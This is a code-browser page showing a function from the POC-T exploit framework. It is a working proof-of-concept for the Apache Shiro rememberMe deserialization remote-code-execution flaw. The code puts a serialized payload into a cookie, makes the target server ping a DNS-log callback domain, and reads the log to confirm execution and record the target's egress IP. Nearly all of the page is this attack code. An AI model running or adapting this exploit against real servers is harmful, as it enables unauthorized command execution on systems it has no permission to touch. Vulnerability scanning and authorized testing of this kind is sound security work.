MCPcopy
hub / github.com/Xyntax/POC-T / poc

Function poc

script/shiro-deserial-rce.py:25–46  ·  view source on GitHub ↗
(url)

Source from the content-addressed store, hash-verified

23
24
25def poc(url):
26 if '://' not in url:
27 target = 'https://%s' % url if ':443' in url else 'http://%s' % url
28 else:
29 target = url
30 try:
31 cloudeye = CloudEye()
32 domain = cloudeye.getRandomDomain('shiro') # 设置dns特征域名组
33 rce_command = 'ping -n 3 %s || ping -c 3 %s' % (domain, domain) # 目标机执行的代码
34 payload = generator(rce_command, JAR_FILE) # 生成payload
35 requests.get(target, cookies={'rememberMe': payload.decode()}, timeout=10) # 发送验证请求
36
37 dnslog = cloudeye.getDnsRecord(delay=2)
38 if domain in dnslog:
39 msg = url
40 for each in re.findall(r'client (.*)#', dnslog): # 获取出口ip
41 msg += ' - ' + each
42 return msg
43
44 except Exception, e:
45 pass
46 return False
47
48
49def generator(command, fp):

Callers

nothing calls this directly

Calls 5

getRandomDomainMethod · 0.95
getDnsRecordMethod · 0.95
CloudEyeClass · 0.90
generatorFunction · 0.85
getMethod · 0.80

Tested by

no test coverage detected